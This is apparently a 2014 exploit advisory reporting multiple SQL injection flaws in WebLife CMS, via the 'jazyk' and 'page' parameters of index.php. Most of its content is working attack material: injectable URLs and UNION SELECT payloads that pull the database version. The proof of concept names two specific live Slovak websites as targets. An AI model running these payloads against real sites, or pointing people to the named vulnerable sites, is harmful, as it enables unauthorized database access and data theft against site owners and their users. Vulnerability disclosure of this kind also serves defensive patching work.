WebLife CMS suffers from a remote SQL injection vulnerability.
709bb5589b06fbb5733cc7479901b4ccf2e8568e0dc997680e6c166fa88f7bee
# Mulitple SQL Injection on WebLife CMS
# Risk: High
# CWE number: CWE-89
# Date: 09/04/2014
# Vendor: www.weblife.sk
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: index.php
# Exploit: http://host/index.php?jazyk=[SQLI]
# http://host/index.php?page=[SQLI]
# PoC:
- Target: www.arsstudionz.sk
- Vuln. File: /index.php?jazyk=
- Exploit: null+union+select 1,2,3,version(),5,6,7,8,9
- Target: www.nitriansketlaciarne.sk
- Vuln. File: /index.php?page=
- Exploit: null+union+select 1,2,version(),4,5,6,7,8,9